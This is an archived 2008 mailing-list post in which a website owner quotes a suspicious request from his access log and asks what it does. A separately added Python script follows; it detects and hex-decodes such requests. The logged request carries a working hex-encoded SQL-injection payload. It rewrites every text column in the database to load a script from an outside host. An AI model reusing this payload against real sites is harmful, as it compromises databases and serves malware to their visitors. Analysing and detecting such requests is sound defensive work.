
[ontolog-forum] Commands Sent to an FeaReferenceModelOntology

To: semantic_web@xxxxxxxxxxxxxxxx, SW-forum <semantic-web@xxxxxx>, semanticweb@xxxxxxxxxxxxxxx, "[ontolog-forum]" <ontolog-forum@xxxxxxxxxxxxxxxx>
From: "Adrian Walker" <adriandwalker@xxxxxxxxx>
Date: Fri, 15 Aug 2008 13:42:12 -0400
Message-id: <1e89d6a40808151042s1218466ua66417ad160466fb@xxxxxxxxxxxxxx>
Hi All --

Your expert advice please.

On our website [1], we support a kind of Wiki for business rules and facts, written in executable English. 

The site can also be used as an SOA endpoint.

One of the sets of rules and facts on the site is a version of the FeaReferenceModelOntology.

We are seeing incoming GET commands like the one listed below.

 [15/Aug/2008:13:10:57 -0400] "GET /demo_agents/FeaReferenceModelOntology2.agent?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 620290

The commands originate from many different sites around the internet, and we have not been able to find out why they are being sent.

Does anyone know please what these commands are trying to do?  Or are they simply buffer overflow attack attempts?

Thanks for your kind thoughts about this, and apologies for cross posting.

                                                   -- Adrian

[1]  Internet Business Logic
A Wiki and SOA Endpoint for Executable Open Vocabulary English over SQL and RDF
Online at www.reengineeringllc.com    Shared use is free

Adrian Walker
Reengineering
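
An added example, not part of the original message: one way to triage requests of the shape logged above is to URL-decode the query string, flag the DECLARE / CAST(0x... AS CHAR) / EXEC(@var) pattern, and hex-decode the literal so an analyst can read the SQL it carries. The function name, regular expressions and sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (not taken from the post). The hex literal in the
# first line decodes to the harmless string "SELECT 1".
SAMPLE_LOG = [
    '[15/Aug/2008:13:10:57 -0400] "GET /demo_agents/Example.agent?;DeCLARE%20@S'
    '%20CHAR(4000);SET%20@S=CAST(0x53454C4543542031%20AS%20CHAR(4000));ExEC(@S);'
    ' HTTP/1.1" 200 512',
    '[15/Aug/2008:13:11:02 -0400] "GET /demo_agents/Example.agent?color=0xFF00FF'
    ' HTTP/1.1" 200 734',
    '[15/Aug/2008:13:11:09 -0400] "GET /index.html HTTP/1.1" 200 1024',
]

# Request target and status code from an access-log line in the format above.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# A hex literal cast to a character type, then executed through a variable.
CAST_HEX = re.compile(
    r'CAST\s*\(\s*0x((?:[0-9a-f]{2})+)\s+AS\s+N?(?:VAR)?CHAR', re.I)
EXEC_VAR = re.compile(r'EXEC\s*\(\s*@\w+\s*\)', re.I)


def analyse(line):
    """Return a finding for a hex-encoded SQL request, or None if benign."""
    m = REQUEST.search(line)
    if not m:
        return None
    # Undo %20-style encoding before matching, as the server would.
    path, _, query = unquote(m.group(1)).partition('?')
    cast = CAST_HEX.search(query)
    if not (cast and EXEC_VAR.search(query)):
        return None
    # Assumes a single-byte CHAR payload, as in the logged request; latin-1
    # maps every byte to a character, so decoding never raises.
    decoded = bytes.fromhex(cast.group(1)).decode('latin-1')
    return {"path": path, "status": int(m.group(2)), "decoded_sql": decoded}


if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        finding = analyse(entry)
        if finding:
            print(finding["status"], finding["path"], "->", finding["decoded_sql"])
```

A 200 status in the finding only shows that the page was served; it does not show whether the decoded SQL ever reached a database.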

